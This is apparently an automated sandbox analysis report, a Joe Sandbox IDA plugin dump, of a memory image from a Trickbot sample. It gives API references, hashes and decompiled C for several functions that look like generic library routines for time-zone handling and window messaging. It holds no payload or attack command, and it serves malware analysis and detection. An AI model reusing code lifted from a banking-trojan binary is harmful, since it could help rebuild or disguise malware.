__EH_prolog.LIBCMT ref: 0041F15A
GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?,?,?), ref: 0041F1C1
GetFileTime.KERNEL32(?,?,?,?,?), ref: 0041F254
SetFileTime.KERNEL32(?,?,?,?), ref: 0041F27F
GetFileSecurityA.ADVAPI32(?,00000004,00000000,00000000,?), ref: 0041F299
GetFileSecurityA.ADVAPI32(?,00000004,00000000,?,?), ref: 0041F2B7
SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 0041F2C2

Part of subcall function 0041D860: lstrcpynA.KERNEL32(00000000,?,00000104,?,?), ref: 0041D887

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: File$Security$Time$DiskFreeH_prologSpacelstrcpyn
String ID:
API String ID: 726943650-0
Opcode ID: acdc8c74b8052b9a8aaab4cb0cc9f68c153388a4b92b63e8d08524ac2903572f
Instruction ID: 7f327c1965ab9e3bf7884f38d1e285739f635e74d4210692c6787f36fd966ae2
Opcode Fuzzy Hash: acdc8c74b8052b9a8aaab4cb0cc9f68c153388a4b92b63e8d08524ac2903572f
Instruction Fuzzy Hash: 72512BB6500209BFDB01EFA1CC85EEEBBB9EF08354F00406AF915A6191DB759E85CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040A95E, Relevance: 4.7, APIs: 3, Instructions: 207
timeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040A95E(void* __eflags) {
				int _v8;
				char* _v12;
				void* __ecx;
				char* _t18;
				intOrPtr _t19;
				intOrPtr _t23;
				char* _t27;
				char _t29;
				char _t30;
				signed int _t32;
				char _t34;
				void* _t35;
				char _t36;
				void* _t37;
				signed int _t39;
				signed int _t40;
				char* _t43;
				char* _t46;
				intOrPtr _t47;
				void* _t56;
				signed int _t60;
				signed int _t63;
				signed int _t65;
				signed int _t67;
				intOrPtr _t68;
				void* _t69;
				void* _t70;
				char* _t74;
				char* _t76;
				signed int** _t80;
				intOrPtr _t87;
				intOrPtr _t89;

				_push(_t55);
				_t70 = 0xc;
				_v12 = 0;
				E00408042(_t70);
				 *0x448718 =  *0x448718 | 0xffffffff;
				 *0x448708 =  *0x448708 | 0xffffffff;
				 *0x44b978 = 0;
				 *_t80 = 0x43eabc;
				_t74 = E0040C065();
				_t56 = _t69;
				if(_t74 != 0) {
					if( *_t74 == 0) {
						L41:
						_t18 = E004080A3(_t70);
					} else {
						_t19 =  *0x44ba2c; // 0x0
						if(_t19 == 0) {
							L18:
							E004053B8( *0x44ba2c);
							_t23 = E0040511B(E00409BE0(_t74) + 1);
							 *0x44ba2c = _t23;
							if(_t23 == 0) {
								goto L41;
							} else {
								E0040A840(_t23, _t74);
								E004080A3(_t70);
								E0040B920( *0x4486fc, _t74, 3);
								_t27 =  *0x4486fc; // 0x44867c
								_t76 = _t74 + 3;
								_t27[3] = _t27[3] & 0x00000000;
								if( *_t76 == 0x2d) {
									_v12 = 1;
									_t76 = _t76 + 1;
								}
								_t60 = E0040615C(_t56, _t76) * 0xe10;
								 *0x448670 = _t60;
								while(1) {
									_t29 =  *_t76;
									if(_t29 != 0x2b && (_t29 < 0x30 || _t29 > 0x39)) {
										break;
									}
									_t76 = _t76 + 1;
								}
								if( *_t76 == 0x3a) {
									_t76 = _t76 + 1;
									_t32 = E0040615C(_t60, _t76);
									_t63 =  *0x448670; // 0x7080
									_t60 = _t63 + _t32 * 0x3c;
									 *0x448670 = _t60;
									while(1) {
										_t34 =  *_t76;
										if(_t34 < 0x30 || _t34 > 0x39) {
											break;
										}
										_t76 = _t76 + 1;
									}
									if( *_t76 == 0x3a) {
										_t76 = _t76 + 1;
										_t35 = E0040615C(_t60, _t76);
										_t65 =  *0x448670; // 0x7080
										_t60 = _t65 + _t35;
										 *0x448670 = _t60;
										while(1) {
											_t36 =  *_t76;
											if(_t36 < 0x30 || _t36 > 0x39) {
												goto L36;
											}
											_t76 = _t76 + 1;
										}
									}
								}
								L36:
								if(_v12 != 0) {
									 *0x448670 =  ~_t60;
								}
								_t30 =  *_t76;
								 *0x448674 = _t30;
								if(_t30 == 0) {
									goto L40;
								} else {
									E0040B920( *0x448700, _t76, 3);
									_t18 =  *0x448700; // 0x4486bc
									_t18[3] = _t18[3] & 0x00000000;
								}
							}
						} else {
							_t37 = E004080C0(_t74, _t19);
							_pop(_t56);
							if(_t37 == 0) {
								goto L41;
							} else {
								goto L18;
							}
						}
					}
				} else {
					E004080A3(_t70);
					 *_t80 = 0x44b980;
					_t18 = GetTimeZoneInformation(??);
					if(_t18 != 0xffffffff) {
						_t39 =  *0x44b980; // 0x0
						_t67 =  *0x44b9d4; // 0x0
						_t40 = _t39 * 0x3c;
						_t87 =  *0x44b9c6; // 0x0
						_t68 = 1;
						 *0x448670 = _t40;
						 *0x44b978 = _t68;
						if(_t87 != 0) {
							 *0x448670 = _t40 + _t67 * 0x3c;
						}
						_t89 =  *0x44ba1a; // 0x0
						if(_t89 == 0) {
							L7:
							 *0x448674 = 0;
							 *0x448678 = 0;
						} else {
							_t47 =  *0x44ba28; // 0x0
							if(_t47 == 0) {
								goto L7;
							} else {
								 *0x448674 = _t68;
								 *0x448678 = (_t47 - _t67) * 0x3c;
							}
						}
						if(WideCharToMultiByte( *0x44b970, 0x220, 0x44b984, 0xffffffff,  *0x4486fc, 0x3f, 0,  &_v8) == 0 || _v8 != 0) {
							_t43 =  *0x4486fc; // 0x44867c
							 *_t43 =  *_t43 & 0x00000000;
						} else {
							_t46 =  *0x4486fc; // 0x44867c
							_t46[0x3f] = _t46[0x3f] & 0x00000000;
						}
						if(WideCharToMultiByte( *0x44b970, 0x220, 0x44b9d8, 0xffffffff,  *0x448700, 0x3f, 0,  &_v8) == 0 || _v8 != 0) {
							L40:
							_t18 =  *0x448700; // 0x4486bc
							 *_t18 =  *_t18 & 0x00000000;
						} else {
							_t18 =  *0x448700; // 0x4486bc
							_t18[0x3f] = _t18[0x3f] & 0x00000000;
						}
					}
				}
				return _t18;
			}

0x0040a962
0x0040a968
0x0040a96c
0x0040a96f
0x0040a974
0x0040a97b
0x0040a982
0x0040a988
0x0040a994
0x0040a996
0x0040a999
0x0040aa9f
0x0040abd9
0x0040abda
0x0040aaa5
0x0040aaa5
0x0040aaac
0x0040aabf
0x0040aac5
0x0040aad2
0x0040aadc
0x0040aae1
0x00000000
0x0040aae7
0x0040aae9
0x0040aaef
0x0040aafd
0x0040ab02
0x0040ab07
0x0040ab0d
0x0040ab14
0x0040ab16
0x0040ab1d
0x0040ab1d
0x0040ab29
0x0040ab2f
0x0040ab35
0x0040ab35
0x0040ab39
0x00000000
0x00000000
0x0040ab43
0x0040ab43
0x0040ab49
0x0040ab4b
0x0040ab4d
0x0040ab56
0x0040ab5c
0x0040ab5e
0x0040ab64
0x0040ab64
0x0040ab68
0x00000000
0x00000000
0x0040ab6e
0x0040ab6e
0x0040ab74
0x0040ab76
0x0040ab78
0x0040ab7e
0x0040ab84
0x0040ab86
0x0040ab8c
0x0040ab8c
0x0040ab90
0x00000000
0x00000000
0x0040ab96
0x0040ab96
0x0040ab8c
0x0040ab74
0x0040ab99
0x0040ab9d
0x0040aba1
0x0040aba1
0x0040aba7
0x0040abac
0x0040abb1
0x00000000
0x0040abb3
0x0040abbc
0x0040abc1
0x0040abc9
0x0040abc9
0x0040abb1
0x0040aaae
0x0040aab0
0x0040aab8
0x0040aab9
0x00000000
0x00000000
0x00000000
0x00000000
0x0040aab9
0x0040aaac
0x0040a99f
0x0040a9a0
0x0040a9a5
0x0040a9ac
0x0040a9b5
0x0040a9bb
0x0040a9c0
0x0040a9c6
0x0040a9c9
0x0040a9d2
0x0040a9d3
0x0040a9d8
0x0040a9de
0x0040a9e7
0x0040a9e7
0x0040a9ec
0x0040a9f3
0x0040aa10
0x0040aa10
0x0040aa16
0x0040a9f5
0x0040a9f5
0x0040a9fc
0x00000000
0x0040a9fe
0x0040aa00
0x0040aa09
0x0040aa09
0x0040a9fc
0x0040aa46
0x0040aa58
0x0040aa5d
0x0040aa4d
0x0040aa4d
0x0040aa52
0x0040aa52
0x0040aa7f
0x0040abcf
0x0040abcf
0x0040abd4
0x0040aa8e
0x0040aa8e
0x0040aa93
0x0040aa93
0x0040aa7f
0x0040a9b5
0x0040abe4

APIs

Part of subcall function 00408042: InitializeCriticalSection.KERNEL32(00000000,?,j/@,000000DC,0040516E,00000009,?,00000000,0040513D,000000E0,0040512A,00402F6A,00402F6A), ref: 0040807F
Part of subcall function 00408042: EnterCriticalSection.KERNEL32(j/@,j/@,000000DC,0040516E,00000009,?,00000000,0040513D,000000E0,0040512A,00402F6A,00402F6A), ref: 0040809A

Part of subcall function 004080A3: LeaveCriticalSection.KERNEL32(?,004053EE,00000009,j/@,0040808E,00000000,?,j/@,000000DC,0040516E,00000009,?,00000000,0040513D,000000E0,0040512A), ref: 004080B0

GetTimeZoneInformation.KERNEL32(0000000C,?,0000000C,?,0000000B,0000000B,?,0040A94F,00406CA5), ref: 0040A9AC
WideCharToMultiByte.KERNEL32(00000220,0044B984,000000FF,0000003F,00000000,?,?,0000000B,0000000B,?,0040A94F,00406CA5), ref: 0040AA42
WideCharToMultiByte.KERNEL32(00000220,0044B9D8,000000FF,0000003F,00000000,?,?,0000000B,0000000B,?,0040A94F,00406CA5), ref: 0040AA7B

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
String ID:
API String ID: 3442286286-0
Opcode ID: e89c520ade0f5e0ba6e23b6c0f3ffec96f96e04f253b3ec7f330ca57c3e9ad1c
Instruction ID: a8ebf62ffa1bd6dc64c0a4e0a79652d9f8147e1207c617059a8d104f752e9cfd
Opcode Fuzzy Hash: e89c520ade0f5e0ba6e23b6c0f3ffec96f96e04f253b3ec7f330ca57c3e9ad1c
Instruction Fuzzy Hash: D96109B55043009ED721AF69EC51B2A7BB5E703314F15013FE680A72E1DB789952CB9F

Uniqueness

Uniqueness Score: -1.00%

Function 004042FB, Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004042FB(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E004041CD() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E004042A5( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x44b0c4(_a4, _a8);
			}

0x00404308
0x0040431c
0x00404330
0x00404348
0x00404332
0x00404339
0x00404339
0x00404350
0x00000000
0x00404352
0x00000000
0x00404359
0x00404350
0x00000000
0x0040431e
0x00000000

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5847c3dd0c427fee8e4d041abcd5c472a9e9d10916e112c6d6433b3af88f36d5
Instruction ID: 558bcf38d93e6d9a7b66166c53d49e0ff65d3de966abc2fc7fcfa35054c1b8c5
Opcode Fuzzy Hash: 5847c3dd0c427fee8e4d041abcd5c472a9e9d10916e112c6d6433b3af88f36d5
Instruction Fuzzy Hash: B1F01D71604109BBDF46AF71DC08AAF7B78BF80344B44A036FE16A51A0DB38DA519B59

Uniqueness

Uniqueness Score: -1.00%

Function 00420A57, Relevance: 4.5, APIs: 3, Instructions: 36
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420A57(void* __ecx, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t7;
				void* _t14;
				void* _t16;
				struct HWND__** _t20;

				_t21 = __ebp;
				_t7 = _a4;
				_t20 = _t7 + 0x1c;
				_t16 = E0041884D(__ebp, GetParent( *(_t7 + 0x1c)));
				if(E0041C5C7(_t16, 0x43b880) == 0) {
					L4:
					return 0;
				}
				if(_a8 != 0) {
					L5:
					return _t16;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t14 = E0041884D(_t21, GetParent( *_t20));
					if(_t14 == 0) {
						goto L5;
					}
					_t6 = _t14 + 0x1c; // 0x1c
					_t20 = _t6;
					if(IsIconic( *(_t14 + 0x1c)) == 0) {
						continue;
					}
					goto L4;
				}
				goto L5;
			}

0x00420a57
0x00420a57
0x00420a67
0x00420a72
0x00420a82
0x00420aa9
0x00000000
0x00420aa9
0x00420a89
0x00420aad
0x00000000
0x00000000
0x00000000
0x00000000
0x00420a8b
0x00420a8b
0x00420a90
0x00420a97
0x00000000
0x00000000
0x00420a9c
0x00420a9c
0x00420aa7
0x00000000
0x00000000
0x00000000
0x00420aa7
0x00000000

APIs

GetParent.USER32(?), ref: 00420A6A
GetParent.USER32(?), ref: 00420A8D
IsIconic.USER32(?), ref: 00420A9F

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Parent$Iconic
String ID:
API String ID: 344791563-0
Opcode ID: 24cf1411d6b4081e499c94d7acc87b497c25d3b1698e20be47ddb37db00d55b1
Instruction ID: b442bd98a8012428f59134a6fea3bf8f9b4399ab8d5330b34e0cac049ac68c34
Opcode Fuzzy Hash: 24cf1411d6b4081e499c94d7acc87b497c25d3b1698e20be47ddb37db00d55b1
Instruction Fuzzy Hash: 33F09032300311AFDB146E62EC44E5B37ACEF90354B81443AB581932A2CA28DC06CA68

Uniqueness

Uniqueness Score: -1.00%

Function 004196D8, Relevance: 3.4, APIs: 2, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 46%

			E004196D8(intOrPtr* __ecx) {
				signed int _t137;
				signed int _t140;
				signed int _t141;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				intOrPtr _t150;
				signed int _t151;
				signed int* _t152;
				signed char _t155;
				unsigned int _t159;
				unsigned int _t167;
				void* _t168;
				signed int _t172;
				signed int* _t176;
				unsigned int _t178;
				intOrPtr* _t179;
				unsigned int _t180;
				intOrPtr* _t181;
				signed int _t186;
				unsigned int _t191;
				unsigned int _t203;
				void* _t205;

				_t182 = __ecx;
				E00405340(E00437830, _t205);
				 *(_t205 - 0x10) =  *(_t205 - 0x10) & 0x00000000;
				_t172 =  *(_t205 + 8);
				_t200 = __ecx;
				if(_t172 != 0x111) {
					if(_t172 != 0x4e) {
						_t203 =  *(_t205 + 0x10);
						if(_t172 == 6) {
							E004185B5(_t182, _t200,  *((intOrPtr*)(_t205 + 0xc)), E0041884D(_t205, _t203));
						}
						if(_t172 != 0x20 || E00418616(_t200, _t203, _t203 >> 0x10) == 0) {
							_t137 =  *((intOrPtr*)( *_t200 + 0x28))();
							 *(_t205 - 0x14) = _t137;
							E004330FA(7);
							_t186 =  *(_t205 + 8);
							_t140 = (_t137 & 0x000001ff ^  *(_t205 + 8) & 0x000001ff) + (_t137 & 0x000001ff ^  *(_t205 + 8) & 0x000001ff) * 2;
							_t176 = 0x449798 + _t140 * 4;
							_t141 =  *(_t205 - 0x14);
							if(_t186 !=  *(0x449798 + _t140 * 4) || _t141 != _t176[2]) {
								 *_t176 = _t186;
								_t176[2] = _t141;
								if(_t141 == 0) {
									L29:
									_t176[1] = _t176[1] & 0x00000000;
									E0043316A(7);
									goto L30;
								}
								L20:
								while(1) {
									if(_t186 >= 0xc000) {
										_t145 = E00419654( *((intOrPtr*)(_t141 + 4)), 0xc000, 0, 0);
										 *(_t205 + 0x10) = _t145;
										if(_t145 == 0) {
											L28:
											_t147 =  *( *(_t205 - 0x14));
											 *(_t205 - 0x14) = _t147;
											if(_t147 != 0) {
												_t141 =  *(_t205 - 0x14);
												_t186 =  *(_t205 + 8);
												continue;
											}
											goto L29;
										}
										while( *((intOrPtr*)( *((intOrPtr*)(_t145 + 0x10)))) !=  *(_t205 + 8)) {
											_t159 = E00419654(_t145 + 0x18, 0xc000, 0, 0);
											 *(_t205 + 0x10) = _t159;
											if(_t159 != 0) {
												_t145 =  *(_t205 + 0x10);
												continue;
											}
											goto L28;
										}
										_t176[1] = _t145;
										E0043316A(7);
										_t180 =  *(_t205 + 0x10);
										goto L96;
									}
									_t148 = E00419654( *((intOrPtr*)(_t141 + 4)), _t186, 0, 0);
									 *(_t205 + 0x10) = _t148;
									if(_t148 != 0) {
										_t176[1] = _t148;
										E0043316A(7);
										_t178 =  *(_t205 + 0x10);
										goto L33;
									}
									goto L28;
								}
							} else {
								_t178 = _t176[1];
								 *(_t205 + 0x10) = _t178;
								E0043316A(7);
								if(_t178 == 0) {
									L30:
									goto L31;
								}
								if( *(_t205 + 8) < 0xc000) {
									L33:
									_t191 =  *(_t205 + 0x10);
									_t179 =  *((intOrPtr*)(_t178 + 0x14));
									_t150 =  *((intOrPtr*)(_t191 + 0x10));
									if( *((intOrPtr*)(_t191 + 8)) == 0x1a) {
										_t155 = GetVersion();
										asm("sbb eax, eax");
										_t150 = (_t155 & 0x000000f0) + 0x2f;
									}
									_t151 = _t150 - 1;
									if(_t151 > 0x30) {
										goto L100;
									} else {
										switch( *((intOrPtr*)(_t151 * 4 +  &M00419B86))) {
											case 0:
												_push( *((intOrPtr*)(_t205 + 0xc)));
												_push(E00420D46());
												goto L52;
											case 1:
												_push( *(__ebp + 0xc));
												goto L52;
											case 2:
												_push(__esi >> 0x10);
												__eax = __si;
												_push(__si);
												__eax = E0041884D(__ebp,  *(__ebp + 0xc));
												goto L55;
											case 3:
												__ecx = __ebp - 0x24;
												E00420CA4(__ebp - 0x24) =  *(__esi + 4);
												 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
												__ecx = __ebp - 0x60;
												 *(__ebp - 0x20) =  *(__esi + 4);
												__eax = E0041842C(__ebp - 0x60);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												_push(__eax);
												 *(__ebp - 4) = 1;
												 *(__ebp - 0x44) = __eax;
												__eax = E00418874();
												if(__eax == 0) {
													__eax =  *(__edi + 0x34);
													if(__eax != 0) {
														__ecx = __eax + 0x20;
														__eax = E00416F2F(__eax + 0x20,  *(__ebp - 0x44));
														if(__eax != 0) {
															 *(__ebp - 0x28) = __eax;
														}
													}
													__eax = __ebp - 0x60;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x24;
												__ecx = __edi;
												_push(__ebp - 0x24);
												__eax =  *__ebx();
												 *(__ebp - 0x20) =  *(__ebp - 0x20) & 0x00000000;
												 *(__ebp - 0x44) =  *(__ebp - 0x44) & 0x00000000;
												 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
												__ecx = __ebp - 0x60;
												 *(__ebp - 0x10) = __ebp - 0x24;
												__eax = E00418EC0(__ebp - 0x60);
												 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
												__ecx = __ebp - 0x24;
												goto L48;
											case 4:
												__ecx = __ebp - 0x24;
												E00420CA4(__ebp - 0x24) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x20) =  *(__esi + 4);
												__eax = __ebp - 0x24;
												_push(__ebp - 0x24);
												__ecx = __edi;
												 *(__ebp - 4) = 2;
												__eax =  *__ebx();
												 *(__ebp - 0x20) =  *(__ebp - 0x20) & 0x00000000;
												 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
												 *(__ebp - 0x10) = __ebp - 0x24;
												__ecx = __ebp - 0x24;
												L48:
												__eax = E00420DC3(__ecx);
												goto L100;
											case 5:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E0041884D(__ebp, __esi);
												goto L54;
											case 6:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L83;
											case 7:
												_push(__esi);
												L52:
												_t154 =  *_t179();
												goto L99;
											case 8:
												L97:
												_push(_t203);
												_push( *((intOrPtr*)(_t205 + 0xc)));
												goto L98;
											case 9:
												_push(__esi);
												_push(E0041CF83());
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L54:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L55:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L99;
											case 0xa:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L100;
											case 0xb:
												_push( *(__ebp + 0xc));
												goto L86;
											case 0xc:
												_push(__esi);
												goto L80;
											case 0xd:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												goto L59;
											case 0xe:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L90;
											case 0xf:
												_push(E0041884D(__ebp,  *(__ebp + 0xc)));
												_push(E0041884D(__ebp, __esi));
												__eax = 0;
												__eax = 0 |  *((intOrPtr*)(__edi + 0x1c)) == __esi;
												goto L62;
											case 0x10:
												_push( *(__ebp + 0xc));
												__eax = E00420D46();
												goto L64;
											case 0x11:
												_push( *(__ebp + 0xc));
												__eax = E0041CF83();
												goto L64;
											case 0x12:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												_push( *(__ebp + 0xc));
												__eax = E0041CF83();
												goto L62;
											case 0x13:
												_push( *(__ebp + 0xc));
												goto L69;
											case 0x14:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L72;
											case 0x15:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												L72:
												_push(__eax);
												__eax = E0041884D(__ebp,  *(__ebp + 0xc));
												goto L62;
											case 0x16:
												_push(__esi);
												__eax = E0041884D(__ebp,  *(__ebp + 0xc));
												L59:
												_push(__eax);
												goto L81;
											case 0x17:
												_push(E0041884D(__ebp, __esi));
												L80:
												_push( *(__ebp + 0xc));
												goto L81;
											case 0x18:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E0041884D(__ebp, __esi);
												goto L88;
											case 0x19:
												__eax =  *(__ebp + 0xc);
												__edx = __ax;
												__eax =  *(__ebp + 0xc) >> 0x10;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												__eax = __ax;
												 *(__ebp + 0xc) = __eax;
												if( *((intOrPtr*)(__ecx + 0x10)) != 0x1d) {
													_push(__eax);
													_push(__edx);
													L81:
													__ecx = __edi;
													__eax =  *__ebx();
													goto L100;
												}
												_push(E0041884D(__ebp, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L91;
											case 0x1a:
												_push(__esi);
												goto L86;
											case 0x1b:
												_push(__esi);
												__ecx = __edi;
												_push( *(__ebp + 0xc));
												__eax =  *__ebx();
												goto L93;
											case 0x1c:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												goto L83;
											case 0x1d:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L99;
											case 0x1e:
												goto L100;
											case 0x1f:
												_push(__esi);
												L69:
												__eax = E0041884D(__ebp);
												L64:
												_push(__eax);
												L86:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L100;
											case 0x20:
												_push(__esi);
												__eax = E0041884D(__ebp,  *(__ebp + 0xc));
												L83:
												_push(__eax);
												L98:
												_t154 =  *_t181();
												L99:
												 *(_t205 - 0x10) = _t154;
												goto L100;
											case 0x21:
												__eax = __si & 0x0000ffff;
												_push(__esi);
												_push(__si & 0x0000ffff);
												__eax =  *(__ebp + 0xc);
												__ecx = __edi;
												__eax =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												if(_t168 != 0) {
													goto L100;
												}
												goto L30;
											case 0x22:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L88:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L62:
												_push(__eax);
												goto L91;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												L90:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L91:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L100;
										}
									}
								}
								L96:
								_t181 =  *((intOrPtr*)(_t180 + 0x14));
								goto L97;
							}
						} else {
							L93:
							 *(_t205 - 0x10) = 1;
							L100:
							_t152 =  *(_t205 + 0x14);
							if(_t152 != 0) {
								 *_t152 =  *(_t205 - 0x10);
							}
							_push(1);
							_pop(0);
							L31:
							 *[fs:0x0] =  *((intOrPtr*)(_t205 - 0xc));
							return 0;
						}
					}
					_t167 =  *(_t205 + 0x10);
					if( *_t167 == 0) {
						goto L30;
					}
					_push(_t205 - 0x10);
					_push(_t167);
					_push( *((intOrPtr*)(_t205 + 0xc)));
					_t168 =  *((intOrPtr*)( *__ecx + 0x7c))();
					goto L6;
				}
				_push( *(_t205 + 0x10));
				_push( *((intOrPtr*)(_t205 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0x78))() == 0) {
					goto L30;
				}
				goto L93;
			}

0x004196d8
0x004196dd
0x004196e5
0x004196ea
0x004196f5
0x004196f7
0x00419714
0x0041973e
0x00419744
0x00419751
0x00419751
0x00419759
0x00419777
0x0041977d
0x0041978f
0x00419794
0x00419797
0x004197a1
0x004197a8
0x004197ab
0x004197db
0x004197dd
0x004197e0
0x00419856
0x00419856
0x0041985c
0x00000000
0x0041985c
0x00000000
0x004197ea
0x004197f1
0x00419812
0x00419819
0x0041981c
0x0041984a
0x0041984d
0x00419851
0x00419854
0x004197e4
0x004197e7
0x00000000
0x004197e7
0x00000000
0x00419854
0x00419823
0x0041983e
0x00419845
0x00419848
0x00419820
0x00000000
0x00419820
0x00000000
0x00419848
0x00419b59
0x00419b5c
0x00419b61
0x00000000
0x00419b61
0x004197fb
0x00419802
0x00419805
0x00419876
0x00419879
0x0041987e
0x00000000
0x0041987e
0x00000000
0x00419807
0x004197b2
0x004197b2
0x004197b7
0x004197ba
0x004197c1
0x00419861
0x00000000
0x00419861
0x004197ce
0x00419881
0x00419881
0x00419884
0x0041988b
0x0041988e
0x00419890
0x0041989b
0x0041989f
0x0041989f
0x004198a2
0x004198a6
0x00000000
0x004198ac
0x004198ac
0x00000000
0x004198b3
0x004198bb
0x00000000
0x00000000
0x004198c1
0x00000000
0x00000000
0x004198ce
0x004198cf
0x004198d2
0x004198d6
0x00000000
0x00000000
0x004198ee
0x004198f6
0x004198f9
0x004198fd
0x00419900
0x00419903
0x00419908
0x0041990a
0x0041990d
0x0041990e
0x00419912
0x00419915
0x0041991c
0x0041991e
0x00419923
0x00419928
0x0041992b
0x00419932
0x00419934
0x00419934
0x00419932
0x00419937
0x00419937
0x0041993a
0x0041993b
0x0041993c
0x0041993f
0x00419941
0x00419942
0x00419944
0x00419948
0x0041994c
0x00419950
0x00419953
0x00419956
0x0041995b
0x0041995f
0x00000000
0x00000000
0x00419964
0x0041996c
0x0041996f
0x00419972
0x00419975
0x00419978
0x00419979
0x0041997b
0x00419982
0x00419984
0x00419988
0x0041998c
0x0041998f
0x00419992
0x00419992
0x00000000
0x00000000
0x0041999f
0x004199a2
0x004199a4
0x00000000
0x00000000
0x004199ae
0x004199b1
0x004199b2
0x00000000
0x00000000
0x004199bb
0x004199bc
0x004199be
0x00000000
0x00000000
0x00419b67
0x00419b67
0x00419b68
0x00000000
0x00000000
0x004199c5
